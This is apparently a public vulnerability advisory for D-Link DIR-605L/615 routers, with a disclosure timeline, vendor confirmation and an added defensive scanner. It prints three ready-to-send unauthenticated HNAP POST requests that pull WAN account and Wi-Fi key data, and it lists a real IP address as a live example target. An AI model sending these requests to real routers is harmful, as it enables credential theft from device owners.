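2014-07-01: Details reported to the vendor; awaiting vendor handling
2014-07-05: Vendor confirmed; details disclosed to the vendor only
2014-07-08: Details opened to third-party security partners
2014-08-29: Details disclosed to core white hats and relevant domain experts
2014-09-08: Details disclosed to regular white hats
2014-09-18: Details disclosed to intern white hats
2014-09-29: Details disclosed to the public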
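With the router's external IP address, sending POST requests directly retrieves the broadband account, Wi-Fi password and other information. If you don't like it, come and damn well hit me.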
Firmware version: 1.12
Hardware version: Ax
Model: DIR-605L
Added: model DIR-615 is also affected.

Retrieving the broadband account and related information
POST /HNAP1/ HTTP/1.0
Connection: keep-alive
Content-Length: 331
SOAPAction: "http://purenetworks.com/HNAP1/GetWanSettings"
Host: <address>:8080
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
 <soap:Body>
  <GetWanSettings xmlns="http://purenetworks.com/HNAP1/">
  </GetWanSettings>
 </soap:Body>
</soap:Envelope>

Retrieving the router's LAN address information
POST /HNAP1/ HTTP/1.0
Connection: keep-alive
Content-Length: 343
SOAPAction: "http://purenetworks.com/HNAP1/GetRouterLanSettings"
Host: <address>:8080
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
 <soap:Body>
  <GetRouterLanSettings xmlns="http://purenetworks.com/HNAP1/">
  </GetRouterLanSettings>
 </soap:Body>
</soap:Envelope>

Retrieving the Wi-Fi password and related information
POST /HNAP1/ HTTP/1.0
Connection: keep-alive
Content-Length: 380
SOAPAction: "http://purenetworks.com/HNAP1/GetWLanRadioSecurity"
Host: <address>:8080
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
 <soap:Body>
  <GetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/">
   <RadioID>2.4GHZ</RadioID>
  </GetWLanRadioSecurity>
 </soap:Body>
</soap:Envelope>

Case: http://27.45.196.132:8080/
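
A defensive check for the three requests above, as an added example that is not part of the original report: it scans captured HTTP requests and flags POSTs to /HNAP1/ that carry one of the report's SOAPAction values without credentials. The Authorization-header test, the function names and the router.example sample capture are assumptions made for illustration.

```python
# Added example: flag unauthenticated, sensitive HNAP reads in captured HTTP requests.
from email.parser import Parser

# SOAPAction names taken from the three requests in this report.
SENSITIVE_ACTIONS = {
    "GetWanSettings": "broadband (WAN) account",
    "GetRouterLanSettings": "LAN addressing",
    "GetWLanRadioSecurity": "Wi-Fi key",
}
HNAP_NS = "http://purenetworks.com/HNAP1/"


def inspect_request(raw):
    """Return a finding for an unauthenticated sensitive HNAP call, else None."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    request_line, _, header_block = head.partition("\n")
    parts = request_line.split()
    if len(parts) < 2 or parts[0].upper() != "POST" or \
            parts[1].split("?", 1)[0].rstrip("/").upper() != "/HNAP1":
        return None
    # The e-mail header parser gives case-insensitive header lookup.
    headers = Parser().parsestr(header_block, headersonly=True)
    action = (headers.get("SOAPAction") or "").strip().strip('"')
    name = action[len(HNAP_NS):] if action.startswith(HNAP_NS) else ""
    if name not in SENSITIVE_ACTIONS:
        return None
    # Assumption: an authenticated client sends an Authorization header.
    if headers.get("Authorization"):
        return None
    return {"action": name, "exposes": SENSITIVE_ACTIONS[name],
            "host": headers.get("Host", "")}


def scan(captured):
    return [f for f in map(inspect_request, captured) if f]


# Constructed sample capture (router.example is a placeholder host).
SAMPLE = [
    'POST /HNAP1/ HTTP/1.0\r\nHost: router.example:8080\r\n'
    'SOAPAction: "http://purenetworks.com/HNAP1/GetWanSettings"\r\n\r\n<xml/>',
    'POST /HNAP1/ HTTP/1.1\r\nHost: router.example:8080\r\nAuthorization: Basic Y29uc3RydWN0ZWQ=\r\n'
    'soapaction: "http://purenetworks.com/HNAP1/GetWLanRadioSecurity"\r\n\r\n<xml/>',
    'GET /index.html HTTP/1.1\r\nHost: router.example:8080\r\n\r\n',
    'POST /HNAP1/ HTTP/1.0\r\nHost: router.example:8080\r\n'
    'SOAPAction: "http://purenetworks.com/HNAP1/GetWLanRadioSecurity"\r\n\r\n<xml/>',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Any hit arriving on the WAN-side management port means the HNAP endpoint is reachable from outside; the vendor reply on this page states that new firmware resolves the issue.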
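Severity: High
Vulnerability Rank: 17
Confirmation time: 2014-07-05 23:39
CNVD confirmed the issue and reproduced the described behaviour on multiple instances; together with wooyun-2014-, it was reported by CNVD through public contact channels to the device manufacturer, D-Link Electronic Equipment (Shanghai) Co., Ltd. (友迅电子设备(上海)有限公司). The manufacturer responded that new firmware has already resolved the issue.
None yet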